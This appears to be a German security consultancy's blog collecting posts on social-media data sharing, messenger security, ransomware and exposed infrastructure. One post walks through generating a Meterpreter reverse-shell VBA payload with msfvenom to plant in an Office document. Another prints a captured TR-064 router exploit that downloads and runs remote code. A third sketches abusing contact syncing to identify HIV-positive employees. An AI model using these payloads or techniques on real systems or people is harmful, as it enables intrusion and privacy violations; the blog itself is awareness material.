Langsam verliert man den Glauben an die Vernunft. Alles was man über Social Media und verbreitete Messenger erfährt führt fast immer in den Misbrauch von Daten. Die Aussagen von Experten, "... wenn ein Produkt kostenlos ist, ist man sicherlich selbst das Produkt...", scheint gültig zu sein.
Wie auf heise.de immer wieder zu lesen ist, sorgen die korellierten Daten aus Instagram, WhatsApp und Facebook, die an Dritte weitergegeben werden, stets für größte Aufregung.
Doch nun kommt endlich einmal ein Statement von Facebook.inc.: Es gibt keine Verletzung der Privatsphäre, da es überhaupt keine Privatsphäre gibt. Das sagte zumindest Facebook-Anwalt Orin Snyder laut US-Medienberichten.
Auch Golem berichtete wieder ausführlich über die Vorgehensweise bei Facebook.
Wir schrieben schon häufiger über die Zusammenhänge bei sozialen Medien. Und es zeigt sich immer: Sobald man um eine Ecke mehr denkt, erkennt man bereits die Macht der Informationen. Und das fängt schon bei den ersten geposteten Urlaubsbildern an, in deren Metadaten man Ort und Zeit findet, als das Bild aufgenommen wurde. Und kurze Zeit später erfolgt der Einbruch in die unbeaufsichtigte Wohnung der Familie...

Wie die New York Times berichtet, gab es seit 2010 vertragliche Partnerschaften zwischen Amazon, Spotify und z.B. Microsoft mit Facebook. Diese ermöglichen es den Partnern private Facebook-Nachrichten lesen, schreiben und verändern zu können.
Es wird weiterhin berichtet, dass z.B. die Royal Bank of Canada auf das Adressbuch, Kalender und private Nachrichten zugreifen, und daraus Interessen und Risiken ihrer Kunden ermitteln kann.
Technisch wäre es nicht notwendig gewesen, der API soviele Rechte einzuräumen. Doch auch Microsofts Suchmaschine Bing erhielt Zugriff auf die Inhalte der 2,2 Milliarden Facebook Nutzer.
Facebook selbst spielt die Angelegenheit herunter, wie auch die Vertragspartner. Man habe nicht gewusst, dass man diese Zugriffsrechte überhaupt habe.
Inzwischen seien die Rechte auf die Inhalte der User stark eingeschränkt worden.

Telegram wurde 2013 von den Brüdern Durow gegründet. Die beiden hatten bereits seit Jahren die russische Version von Facebook namens vk.com in Betrieb. Vk generiert, genau wie Facebook, seine Einnahmen aus gezielter Werbung. Diese Form von Werbung funktioniert natürlich nur, wenn man die Interessen seiner Nutzer kennt.
Von Experten wie Bruce Schneier und Moxie Marlinspike wird die proprietäre Verschlüsselung schon lange angezweifelt. Telegram nutzt das selbst entwickelte MTProto-Protokol. Dieses wird aber weder vom Webclient noch vom Desktop-Client unterstützt. Somit wird also meistens Klartext per TLS verschickt. Mit Abhörsicherheit hat das natürlich nichts mehr zu tun. Trotz des schlechten Rufes unter Experten erfreut sich der Messenger bei seinen Nutzern großer Beliebtheit.
Nun wurde bekannt, daß Telegram die IP-Adressen, Telefonnummern und Chatverläufe seiner Nutzer gemäß DSGVO in Verdachtsfällen an entsprechende Behörden weiter geben würde. In solchen Fällen würde man das im Halbjahresbericht offen legen.
Doch es gibt weder eine Definition, was diese (Terror-)verdachtsfälle eigentlich sind, noch einen Halbjahresbericht.
Für Geheimdienste, darunter auch das Bundeskriminalamt, ist dieser Zustrom zur schlechten Verschlüsselung durchaus wünschenswert, da der Zugriff auf die SS7 Schnittstelle für alle Messenger ohne Zwei-Faktor-Authentisierung, die sich einzig auf eine Telefonnummer verlassen, ein massives Sicherheitsproblem darstellt. Das gilt sowohl für Telegram als auch für WhatsApp.

Haben Sie einen Brief von Mastercard bekommen, in dem sie über die Verwendung ihrer Daten aufgeklärt wurden?
Laut Bloomberg hat Google einen Weg gefunden, den Zusammenhang zwischen Werbung und realen Einkäufen zu korellieren.
Zwei Mitarbeiter, die an den Verhandlungen beteiligt waren, gaben an, daß Google an Mastercard mehrere Millionen Dollar für die Transaktionsdaten gezahlt habe.
Angeblich bestehe die Möglichkeit diesen Informationsfluss zu unterbinden, indem man in Googles Management-Console "Web and App Activity" abschaltet.
Wirklich schade, daß die DSGVO einfach nicht funktionieren will, die die Firmen angeblich verpflichtet, ihre Kunden zu informieren, welche Daten zu welchem Zweck erfaßt, gespeichert und weitergegeben werden...

Wir alle wussten es längst. Wir sind nicht die Kunden von Facebook, sondern die Werbetreibenden sind es. Wir sind die Ware, die zum Verkauf steht. Natürlich nicht wir als Person, vielmehr die Informationen, worauf wir besonders reagieren. Wenn man diese Informationen geschickt nutzt, sind Menschen steuerbar, wie die welt schreibt. Glücklicherweise hat Facebook genau die richtigen Werkzeuge zur Manipulation von Menschen, denn Facebook kann dem Nutzer genau die Informationen auch präsentieren, die die erwarteten Reaktionen auslösen.
Im Verlauf des Facebook-Skandals konnten wir sehen, wie weit unsere Daten verloren gingen. Interessant ist aber auch, wie leicht der Zugang zu diesen, bereits von cambridge-analytica aufbereiteten Daten, ist und welche Aussagen dort zusammengefasst wurden.
Im Video von Channel 4 wurden Menschen befragt, ob die Daten, die angeblich hätten gelöscht werden sollen, auf sie zutreffen - mit erstaunlichen Übereinstimmungen.
Doch genau jetzt unternimmt Facebook erneut den Versuch, die Daten des Tochterunternehmens WhatsApp mit denen von Facebook zu korellieren , um noch genauere Nutzerprofile erstellen lassen zu können. Ausgerechnet, nachdem bekannt wurde, daß Facebook die Metadaten von versandten SMS und geführten Telefonaten nach Hause sendet und Kontaktdaten auf Telefonen so manipuliert, daß die bevorzugte Kommunikation via Facekook ablaufen soll. So kann es schon passieren, daß man Firmenpost versehentlich an die Facebook-Adresse verschickt, obwohl sonst immer der Geschäftskontakt bevorzugt wurde.
Wir haben in einem früheren Bericht ja schon Möglichkeiten aufgezeigt, wie leicht sich jeder die Daten von WhatsApp zu Nutze machen kann.
Was kann also durch den Zusammenschluß beider Unternehmensdaten passieren?
Stellen wir uns vor, eine Firma möchte wissen, ob im Unternehmen HIV-erkrankte Mitarbeiter arbeiten. Diese Firma könnte z.B die Telefonnummern von AIDS-Beratungsstellen im Umfeld in ihr Telefonbuch aufnehmen. WhatsApp würde das Adressbuch auf seine Server hochladen und an Facebook weitergeben. Die Facebook-App wäre dann so freundlich, und würde neue Freunde vorschlagen, da man offensichtlich einen gemeinsamen Bekannten hat: Die AIDS-Beratungsstellen! Die so gewonnenen Personen bräuchte diese Firma nur schnell mit ihrer Mitarbeiterdatenbank abzugleichen. Und schon wären die Verdächtigen ermittelt.
Ist WhatsApp jetzt also illegal? Diese Frage hat sich eine Anwaltskanzlei bereits gestellt, und ihre Ergebnisse hier zusammengetragen.
Gibt es Alternativen? Signal, wire und briar sind sicherlich auf der Liste. Auch wenn bei z.B. Signal Telefonnummern ungehasht übertragen werden.
Von Telegram sollte man jedoch besser die Finger lassen, da die Kommunikation i.A. zwischen der App und dem Telegram-Server verschlüsselt werden. Man kann in Russland also die Gespräche belauschen. Auch die Zeitung die welt hat eine Meinung zu diesem Messenger.

Doch wie auch immer sich diese Situation weiter entwickeln wird: Wir können ihnen helfen, eine abhörsichere Kommunikation herzustellen.

Security Experten sind sich einig: Let’s put a webcam in every bedroom. What can possibly go wrong?
Man muss sich schon die Frage stellen, warum ein Gerät zum Chatten und Sprachkommandos entgegennehmen die Form eines Weckers annehmen muss?

Facebook schützt Profilbilder seit Juni 2017 auf besondere Weise und verhindert somit Bilderklau.
Das ist sicherlich eine gute Idee, denn das Profilbild versichert schließlich, dass man mit der richtigen Person Kontakt aufnimmt.
Als Folge werden nun sicherlich viele User Facebook ihre realen Bilder zur Verfügung stellen, und es dem Anbieter ermöglichen zu den sowieso bereits gut gepflegten Telefonbucheinträgen auch noch die realen Gesichter zu erhalten.
Ein Schurke, wer Böses dabei denkt :)

Das Amtsgericht Bad Hersfeld hat entschieden, dass Eltern die Smartphone-Nutzung ihrer Kinder genau überwachen müssen. Insbesondere müssten Eltern die Einwilligung aller Kommunikationspartner des Kindes einholen, wenn es Whatsapp benutzt.
Dies sei notwendig, da Whatsapp "nach den technischen Vorgaben des Dienstes fortlaufend Daten in Klardaten-Form von allen in dem eigenen Smartphone-Adressbuch eingetragenen Kontaktpersonen an das hinter dem Dienst stehende Unternehmen" übermittele.
Wer keine solche Einwilligung der Kommunikationspartner vorweisen könne, begehe ein "deliktisches Verhalten" und riskiere, von der betreffenden Person kostenpflichtig abgemahnt zu werden.
Ein deliktisches Verhalten ist darin zu ersehen, dass er als aktiver Nutzer der App "WhatsApp" auf dem von ihm verwendeten Smartphone fortlaufend Datensätze von anderen Personen an den dahinterstehenden Betreiber (WhatsApp Inc., Kalifornien / USA) über die jeweils bestehende Internetverbindung weiterleitet, ohne überhaupt dazu befugt zu sein.
Eltern, die sich noch nicht mit "smarter" Technik auskennen, so das Gericht, müssten sich diese Kenntnisse "unmittelbar und kontinuierlich" aneignen, um "ihre Pflicht zur Begleitung und Aufsicht durchgehend ordentlich erfüllen zu können".

Haben Sie sich die AGBs von WhatsApp einmal genauer angesehen, oder klicken sie einfach nur durch? Dort steht unter Anderem:

• "Du stellst uns regelmäßig die Telefonnummern von WhatsApp-Nutzern und deinen sonstigen Kontakten in deinem Mobiltelefon-Adressbuch zur Verfügung. Du bestätigst, dass du autorisiert bist, uns solche Telefonnummern zur Verfügung zu stellen."
• "Du akzeptierst unsere Datenpraktiken, einschließlich des Sammelns, der Verwendung, der Verarbeitung und des Teilens deiner Informationen (...), sowie die Übertragung und Verarbeitung deiner Informationen in die/den USA und andere/n Länder/n weltweit."
• "Du musst über die erforderlichen Rechte in Bezug auf solche von dir für deinen WhatsApp-Account bzw. über unsere Dienste übermittelten Informationen sowie über das Recht zur Gewährung der Rechte und Lizenzen gemäß unseren Bedingungen verfügen."
• "Du gewährst WhatsApp eine weltweite, nicht-exklusive, gebührenfreie, unterlizenzierbare und übertragbare Lizenz zur Nutzung, Reproduktion, Verbreitung, Erstellung abgeleiteter Werke, Darstellung und Aufführung der Informationen (einschließlich der Inhalte), die du auf bzw. über unsere/n Dienste/n hochlädst, übermittelst, speicherst, sendest oder empfängst."

Wir haben uns ja schon fast daran gewöhnt, daß es immer wieder Leute und Behörden gibt , deren Rechner einem Verschlüsselungstrojaner zum Opfer fallen. Aber wo haben diese Trojaner eigentlich ihren größten Erfolg?
Es zeigt sich, daß meist Systeme befallen werden, deren Betriebssystem nicht schnell genug aktualisiert werden kann. Wie zum Beispiel Kassensysteme, die Anzeigetafeln der Bahn und all die Systeme, die uns durch die Nachrichten ins Gedächtnis zurück gerufen werden.
Es gibt aber ganz andere Systeme, die ebenfalls selten aktualisiert werden. Und die könnten ganz in der Nähe von Kraftwerken stehen. Zum Beispiel Geigerzälher im Atomkraftwerk Tschernobyl. Als dort auch noch die Webseite des Kraftwerkes ausfiel, wurden einige nervös.
Doch wie kommt ein Trojaner in die Nähe von kritischer Infrastruktur? Der Grund ist meist schnell gefunden: Aus Kostengründen. Denn damit nicht ständig Personal zu z.B. Geldautomaten fahren muss, richtet man einfach schnell einen Fernwartungszugang ein. So können sich Servicetechniker aus dem Büro einloggen und nach dem Rechten sehen. Aber oft eben nicht nur die Servicetechniker. Oder noch besser: Die Servicetechniker bringen den Trojaner gleich mit!
Aber eigentlich sollte das bei Microsoft nicht mehr möglich sein. Denn nun verhindert der Windows Defender alle Angriffe. Oder vielleicht doch nicht?
Im Gegenteil: Der Einsatz des mitgelieferten AV-Programmes stellt die Lücke sogar selbst zur Verfügung. Und der User muss dabei noch nicht einmal etwas anklicken. Das übernimmt der Microsoft-Defender.
Wie kann man sich da überhaupt noch schützen? Wer an Windows gebunden ist, sollte zeitnah auf Updates aus legaler Herkunft achten. Möglicherweise können sie sich auch ein Intrusion-Prevention-System in ihrer Firma aufbauen.
Wir beraten sie gerne bei der Segmentierung ihres Netzes und der Auswahl einer geeigneten Firewall.

Seit der Einführung von Windows 10 erregen sich die Gemüter der Experten.
Geht es meistens um rechtliche und Datenschutztechnische Bedenken, zerbrechen sich die technisch orientierten Spezialisten den Kopf über die folgenden Zusammenhänge:
Windows läuft nur mit einer gültigen Lizenz. Diese muss spätestens alle 186 Tage online aktualisiert werden. Das Betriebssystem verweigert ebenfalls seinen Dienst, wenn Updates nicht installiert wurden.
Dies wird glücklicherweise im Hintergrund erledigt, mag sich so mancher denken. Doch weiß niemand, was Microsoft (oder die NSA?) einem eigentlich installiert, oder vom Computer kopiert.
Abgesehen von Werksspionage, die auf diese Weise möglich wäre, haben Experten das Betriebssystem bereits als Virus bezeichnet. Denn ein Virus ist ein Programm, welches ohne Wissen des Benutzers und ohne dessen Erlaubnis auf einem Rechner läuft. Und genau das passiert im Hintergrund bei Microsoft-Updates: Niemand kann sagen, welche Programme übertragen und gestartet werden. Aber ohne stellt das System seinen Dienst ein.

Nun stellt sich die Frage, wo das Betriebssystem zum Einsatz kommt. In kritischer Infrastruktur? Bei Behörden? Vielleicht militärisch?
Schon 2015 warnte Rüdiger Weis vor Windows 10. Und seine Argumente sind stichhaltig. Schon die Möglichkeiten, die das TPM bietet, sind ein Traum für die NSA.
Unsere Regierung und Betreiber von kritischen Infrastrukturen sollten sich daher Gedanken machen, welche Alternativen hier bestehen. Auch andere große Unternehmen täten gut daran über Spionageabwehr nachzudenken.
Für Endnutzer und Kleinbetriebe bieten wir bei Meister-Security bereits jetzt schon Alternativen für Windows, Fritzbox und die Hausautomation von RWE und Co.

Bei all den Angriffen auf Microsoft Systeme hat sich vor Jahren ThyssenKrupp vorbildlich verhalten. Nachdem Hacker einen Hochofen schwer beschädigt hatten, hat der Konzern 18 Security-Ingenieure eingestellt, die sich im Wesentlichen mit Netzwerk- und Hostforensik befassten. So konnte ein paar Jahre später ein laufender Angriff erkannt werden.
Es ist schon ein Paradox: Einerseits investieren Firmen in die Qualifikation ihrer eigenen Mitarbeiter. Andererseits ignorieren diese Firmen dann das daraus hervorgegangene Expertenwissen.

Jetzt ist es tatsächlich passiert: Hacker brechen aus einer virtuellen Maschine aus.
Sollte doch gerade die Virtualisierung für eine Trennung der Systeme sorgen, ist nun auch diese Barriere gefallen. Zheng Zheng von Qihoo 360 beschrieb das Vorgehen in einer E-Mail: "Zuerst nutzten wir einen Fehler in der JavaScript-Engine von Microsoft Edge aus, um Code innerhalb der Edge-Sandbox auszuführen; dann bedienten wir uns eines Bugs im Windows-10-Kernel, um aus der Sandbox auszubrechen und das Gastsystem zu kompromittieren. Über eine Schwachstelle der Hardware-Simulation von VMWare gelangten wir schließlich vom Gast- auf das Host-System. Für all das reichte eine entsprechend präparierte Webseite."

VMware schliesst kritische Pwn2Own Lücken
VirtualBox - Guest-to-Host Privilege Escalation
Xen: Speicher des Hostsystems vom Guest auslesbar. Passwörter der Cloudbetreiber in Gefahr.
Microsoft Azure: Update left Linux virtual machines open to hacking
Microsoft Office 365: Massive security flaw found

Nachdem wir bereits 2013 auf Sicherheitslücken in Krankenhäusern aufmerksam machten, fanden die Sicherheitsforscher Tim Philipp Schäfers und Sebastian Neef von Internetwache.org in ihren regelmäßigen Scans die ungeschützte Haussteuerung einer Schweizer Luxusklinik.
Soetwas sollte natürlich niemals vorkommen. Dennoch hatten die Beiden Zugriff auf die Sauerstoffversorgung und medizinische Gase in den OP-Räumen.
Hatten die Sicherheitsforscher doch gerade erst gezeigt, daß man auch Ampelanlagen via Internet steuern kann.

Alle regen sich über Wahlmanipulation auf, dabei ist dies speziell in den USA besonders einfach. Dort werden die Stimmen mit Wahlautomaten erfasst. Und gerade dieser Umstand erleichtert eine Manipulation besonders.
Letzten Monat zeigte Cylance in einem Video, wie einfach sich diese Maschinen mit beliebigen Ergebnissen einstellen lassen.

Ein wirklich gut getarnter Verschlüsselungstrojaner wird derzeit in Bewerbungsmails an Personalabteilungen verschickt. Da die Erpresser wissen, daß Personalabteilungen die Unterlagen sichten müssen, können sie davon ausgehen, daß sie großen Erfolg haben.
Anfällig ist bisher nur Windows, da sich in dem präparierten Excel-Dokument ein VBA-Script befindet. Das Anschreiben selbst liegt gut formuliert als PDF-Datei vor und enthält den Hinweis, daß weitere Informationen über den Bewerber in einer Exceltabelle aufgelistet wären.
Auch die #heiseshow berichtet wieder ausführlich in einem Video, wie dies für den User aussieht und wie man sich am klügsten verhält.
Dabei läßt sich solch ein Trojaner sehr einfach bauen. Um einen Windows Rechner auf diese Weise zu übernehmen, benötigt man lediglich metasploit und ein verlockendes Office-Dokument. In dieses wird die Malware dann integriert. Dazu baut man zuerst eine Payload mit msfvenom:

root@kali: # msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp \
LHOST=cnc.netsectrainings.de LPORT=8080 -e x86/shikata_ga_nai -f vba-exe           
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326
Payload size: 326 bytes
'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
...

Es war nur eine Frage der Zeit, bis jemand auf die Idee kommt einen Dienst, der nicht einmal mit einem Passwort abgesichert ist, für seine Zwecke zu nutzen.
Gestern fielen ca. 900.000 Kunden der Telekom wie auch einige Dienste der Bundesregierung und des BSI (die ebenfalls von der Telekom verwaltet werden) einem breit aufgestellten Angriff zum Opfer. Dabei war dieser nicht einmal eine besondere Herausforderung.
Allerdings war dieser Angriff überhaupt nicht gegen die Telekom und seine Kunden gerichtet. Vielmehr handelte es sich um Auswirkungen eines Angriffs eines Botnetzes gegen Kunden des irischen Providers Eir. Auch deutsche Kunden waren davon betroffen. Doch die Router der Telekomkunden sind für diesen Angriff eigentlich nicht anfällig. Wiederholt sich dieser aber in kurzen Abständen, stürzt der Router ab. Die Folge: Telekom Kunden kommen nicht mehr ins Internet!

Doch was sollte überhaupt durch die Hacker erreicht werden? Normalerweise verwalten große Provider ihre Kundenrouter über das Protokoll TR-069. Im Kundennetz kommt TR-064 zum Einsatz. Dieses Protokoll ist bei Telekom-Kunden (aber auch einigen anderen Providern!) direkt aus dem Internet für jeden erreichbar und könnte dazu verwendet werden, die Konfiguration des Routers zu verändern.
Wir haben zur Analyse des Telekom-Ausfalls einmal den Port 7547 an unserer Firewall geöffnet, und beobachtet, welche Pakete an unserer pfsense aufschlagen. Dazu haben wir einen ncat-Listener geöffnet und die Daten in eine Datei umgeleitet. Hier ein kurzer Ausschnitt:

cd /tmp;wget http://ntp.timerserver.host/1;chmod 777 1;./1

http://5.8.65.5/1
http://5.8.65.5/2
http://l.ocalhost.host/1
http://l.ocalhost.host/2
http://l.ocalhost.host/3
http://l.ocalhost.host/x.sh
http://ntp.timerserver.host/1
http://p.ocalhost.host/x.sh
http://timeserver.host/1
http://tr069.pw/1
http://tr069.pw/2

POST /
HTTP/1.1\r\nMyname--is:
\r\nHost:
Cookie:
\r\n\r\n
http
url=
POST
/proc/net/tcp
busybox killall -9 telnetd
busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
%d.%d.%d.%d
sigaction
abcdefghijklmnopqrstuvw012345678
PMMV
TKXZT
CFOKL
POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7547\r\n
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\n
Content-Type: text/xml\r\n
Content-Length: 526\r\n\r\n
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>'cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1'</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>
</u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>\r\n

Wie heise berichtet, hat eine Forschergruppe aus Israel und Kanada einen Angriff auf smarte Philips-Glühbirnen vorgestellt, der sich liest als sei er direkt aus einem William-Gibson-Roman entsprungen. Eine infizierte Glühlampe hackt drahtlos benachbarte Birnen und verbreitet auf diesem Weg einen Firmware-Wurm der die Lampen wild flackern lässt oder sie zerstört – potenziell könnte sich der Schadcode so über eine ganze Stadt ausbreiten und alle smarten Glühbirnen übernehmen. Je mehr Birnen sich dicht beieinander befinden, desto schneller verbreitet sich der Wurm. In ihren Versuchen gelang es den Forschern smarte Lampen sowohl im Vorbeifahren mit dem Auto als auch im Vorbeiflug mit einer Drohne zu infizieren.

Am 09.11.2016 hat WhatsApp die Datenweitergabe an den Mutterkonzern gestoppt. Dies ist erstmal eine beruhigende Nachricht, denn es erschwert Angriffe auf die Privatsphäre, wie wir sie bereits vor Monaten aufgezeigt haben.
Zwischen Instagram und Facebook scheint es ein ähnliches Angriffsmuster zu geben. Die Analyse dieser Zusammenhänge betreibt derzeit unser Partnerunternehmen nonn-security.

Am 05.08.2015 demonstrierte Joshua Drake auf der Defcon eine Sicherheitslücke, welche bereits seit Android 2.2 auf Smartphones offen steht. Seither haben die Hersteller eher mangelhaft reagiert. 950 Millionen Geräte weisen heute noch diese Sicherheitslücken auf. Bei Geräten der Nexus Reihe und Geräten, auf denen sich z.B. LineageOS installieren läßt, lassen sich diese Lücken schließen.
In diesem Video zeige ich, was für den Angriff auch ein ungepatchtes Smartphone nötig ist.
Ob das eigene Smartphone diese Lücke aufweist kann durch einen Test leicht herausgefunden werden. Dazu installiert man einfach den Stagefright-Detector. Dieser überprüft das Smartphone. Sollte man verwundbar sein, ist schnelles Handeln angesagt. Auch wenn man kein Onlinebanking mit dem Smartphone macht, könnte doch über dieses Smartphone ein weiterer Angriff stattfinden. Und dann ist es meist schwer zu beweisen, daß man damit eigentlich nichts zu tun hatte...

Nachdem der Vorfall einer Psychologin (ich berichtete bereits) bekannt wurde, explodierten die Nutzerzahlen von Threema über das vergangene Wochenende.
"Threema" ist ein WhatsApp-Klon, der die Daten verschlüsselt überträgt. Dazu werden keine Telefonnummern oder eMail-Adressen benötigt. Dies sollte eigentlich ein Standard werden, doch es scheint den Nutzern nicht zumutbar zu sein, sich vor der Konversation gegenseitig das Smartphone zu zeigen, da dort ein QR-Code angezeigt wird, mit dem später bewiesen wird, daß die Nutzer sich irgendwann einmal gegenüber gestanden haben mussten.
Zugegeben, dieses Programm ist wie WhatsApp "Closed Source". Aber es gelang bisher noch niemandem das Gegenteil zu beweisen, daß diese App nicht genau das tut, was sie verspricht.
Eine andere Alternative ist "Signal". Dieses Programm kann öffentlich eingesehen werden. Es gibt keine Geheimnisse. Und: auch verschlüsselte Anrufe und Video-Chats sind möglich!
Natürlich haben soviele Vorteile irgend einen Nachteil. Und in der Tat: Zur Kontaktaufnahme ist, wie bei WhatsApp, die Preisgabe der Telefonnummer für eine Bestätigungs-SMS notwendig.
Wer auch das vermeiden will, wechselt zu "Bleep". Diese App kombiniert nur die Vorteile der anderen Apps.

Allgemein kann man es wohl so vereinfachen: Je einfacher ein Produkt zu bedienen,
um so mehr ist der Benutzer das eigentliche Produkt...

Eine Schülerin hat sich auf Facebook darüber aufgeregt, daß die Inhalte auf einer rechts orientierten Webseite absolut hirnlose Darstellungen enthielten. Da sie die Seite als URL in ihrem Posting erwähnte, erschien in ihrem Profil "Jessica likes this".
Dies ist natürlich eine absolut falsche Darstellung der wahren Situation und rückt die Schülerin in ein falsches Licht.
Scheinbar liked die Facebook App automatisch in Postings genannte URLs. Reproduzieren konnten wir diesen Vorwurf nicht wirklich. Es fiel uns dabei aber eine andere Methode ins Auge: Es ist möglich per Webseite Autolikes in Facebook zu erzeugen. Dazu ist nur der Besuch der Webseite nötig. Unglücklicherweise folgen manche Browser Links auf Webseiten im Voraus, um diese schneller darstellen zu können. Dabei treten sie oft in die aufgestellte Falle.

Gerade erst hat WhatsApp die Zusammenlegung der Kontaktinformationen mit Facebook bekannt gegeben, da gibt es auch schon die ersten Skandale.
Ein besonders interessanter Vorfall ergab sich, als die Patientin einer Psychiaterin deren Telefonnummer in ihr Telefonbuch auf ihrem iPhone speicherte. Kurze Zeit später wurde ihr Telefonbuch von der WhatsApp auf den WhatsApp-Server hochgeladen. Durch den Zusammenschluss mit Facebook landete ihr Telefonbuch also auch auf den Servern von Facebook (wahrscheinlich nurnoch ein Server, da dies kostensparender ist - Anmerk. d. Authors).
Doch hier nun geschah etwas sehr interessantes: Facebook machte der Patientin Freundschaftsvorschläge, da sie offensichtlich mit anderen zusammen einen gemeinsamen Bekannten habe (die Psychiaterin).
Ein Angriff auf die Persönlichkeitsrechte scheint einfach: Man braucht nur einen neuen Kontakt ins Telefonbuch hinzufügen, WhatsApp gibt die Daten an Facebook, und tada: Facebook verrät alle Patienten der Psychologin!
Man kann sich nun fragen, wer hier die Persönlichkeitsrechte verletzt. Die Psychiaterin? Sie ist nicht einmal Mitglied in den sozialen Medien. WhatsApp hat in den AGBs diesen Umstand erwähnt und ist damit aus dem Schneider. Die Patientin? Sie kannte die AGBs und hätte, genauso wie alle anderen WhatsApper, dem Netz fern bleiben können...
Aber wer tut es?

Nachdem bei der Übernahme durch Facebook 2014 vereinbart wurde, die Daten beider Dienste getrennt zu lassen, soll Facebook die Telefon-Nummer des WhatsApp-Nutzers bekommen sowie Informationen dazu, wann er bei dem Dienst aktiv war.

Doch lässt sich die Datenweitergabe verhindern? Ganz klares Nein! Denn wie heißt es in der App so schön:

"Falls du deine Account-Informationen nicht mit Facebook teilen möchtest, um deine Facebook-Werbung und Produkterlebnisse zu verbessern, kannst du das Häkchen aus dem Kästchen entfernen oder den Schieberegler umschalten. Die Facebook-Unternehmensgruppe wird diese Information trotzdem erhalten und für andere Zwecke, wie Verbesserung von Infrastruktur und Zustellsystemen, des Verstehens der Art der Nutzung unserer bzw. ihrer Dienste, der Absicherung der Systeme und der Bekämpfung von Spam, Missbrauch bzw. Verletzungshandlungen."

Wenn man in eine Suchmaschine einen Ort oder eine Straße eingibt, findet man nicht immer nur eine dort ansässige Firma. Leider finden Angreifer mit den richtigen Stichworten auch deren Fehlkonfigurationen.
So war es uns möglich, bereits in den Suchergebnissen und dem Google-Cache brisante Firmendaten zu finden, ohne jemals eine Verbindung zu dieser Firma aufgebaut zu haben.
Doch die Firmen, welche wir auf die vermeindlichen Lücken aufmerksam machten, reagierten mit Unverständnis. Hätten sie doch extra einen großen Provider mit dem Internetanschluss beauftragt...

Es ist schon erstaunlich, wie leichtfertig Wasserwerksbetreiber in Deutschland ihre Kontrollsysteme im Internet bereitstellen. Ebenso finden sich Hausautomationen und Kraftwerke per Google-Suche im Browser wieder. Es wäre leicht möglich gewesen, in fremden Häusern Haustüren per Türöffner zu öffnen, Licht und Heizung auf Extremwerte einzustellen, oder Blockkraftwerke an ihre Grenzen zu treiben.
Meister-Security zeigte, wie leicht Firmendrucker/Scanner zu finden sind, die dort möglicherweise Firmengeheimnisse preisgeben, und wie ebenso leicht es möglich gewesen wäre, diesen Zugriff nur für befugtes Peronal zugänglich zu machen.

Dass man nicht unbedingt einen Server angreifen muss, um in eine Firma einzubrechen, wurde am 17. Juni eindrucksvoll gezeigt. Mit einem externen Objekt in einer Mail gelang es ein Mailprogramm (Outlook) zu übernehmen. Kurz darauf konnte demonstriert werden, wie auch ein Einbruch über den Browser in eine Firma funktioniert. Dies funktionierte sogar per https durch eine Firewall, ja sogar durch den Firmenproxy.
Welche Gegenmaßnahmen möglich sind, konnte ebenfalls sehr eindrücklich vorgeführt werden.

Erst WhatsApp, jetzt Facebook: Das soziale Netzwerk spendiert seiner Messenger-App eine optionale Ende-zu-Ende-Verschlüsselung. Nachdem das zu Facebook gehörende Chat-Programm WhatsApp im April 2016 eine plattformübergreifende Ende-zu-Ende-Verschlüsselung spendiert bekam, will der Mutterkonzern nun auch den Nutzern des eigenen Messengers mehr Privatsphäre bieten und führt in den kommenden Monaten die sogenannten „Secret Conversations“ ein. Dabei handelt es sich um die Möglichkeit, einzelne Konversationen komplett zu verschlüsseln. Dies gab das soziale Netzwerk im unternehmenseigenen Blog bekannt.
Ein aufmerksamer User bemerkte nun, daß die facebook-App heimlich im Hintergrund URLs "liked", die in Konversationen genannt werden und die Nachrichten filtert.
Dies könnte fatale Folgen haben. Meister-Security wird Zusammenhänge zwischen Facebook und WhatsApp weiter analysieren.
Grundsätzlich ist es natürlich ein schlauer Schachzug, die Daten nicht mehr mit den eigenen Servern zu analysieren, sondern die Analyse auf die Smartphones der Kunden auszulagern, bevor die Nachrichten verschlüsselt werden. Das spart viel Rechenleistung bei Facebook und WhatsApp. Und die Behauptung, Nachrichten würden verschlüsselt, ist ja richtig. Die Daten werden allerdings bereits vorher analysiert...

Am 22. April fand wieder eine Schulung über die Manipulation von Netzen statt. Es wurde gezeigt, wie in Firmennetzen und Schulen Daten über den angreifenden Rechner umgeleitet werden können. Sind die Daten erstmal verfügbar, lassen sie sich auch leicht mitlesen oder verändern. Vorgestellt wurden Tools, wie die verbreitete Burpsuite und sslstrip, mit denen sich auch verschlüsselte Verbindungen aufbrechen lassen.

Es scheint gängige Praxis zu sein, das WLAN bei Smartphones angeschaltet zu lassen. "Hier ist ja sowieso kein Netz!", sagen die meisten Nutzer. Messungen von Meister-Security haben jedoch gezeigt, daß fast jedes Mobiltelefon nach seinen bekannten Accesspoints ruft. Nicht auszudenken wenn ein Angreifer sein WLAN z.B. "TELEKOM" nennt. Sofort würden Smartphones, die bereits Kontakt mit einem TELEKOM-Accesspoint hatten, die Verbindung herstellen. Unerwünschter Nebeneffekt: Der Angreifer ist nun "Man-in-the-Middle" und kann sämtlichen Datenverkehr mitlesen. Und das sind selten nur die whatsapp Zugangsdaten.
Besonders Firmen-iPhones sind ein leichtes Ziel, da man Hotel-Accesspoints meist nicht wieder löschen kann!
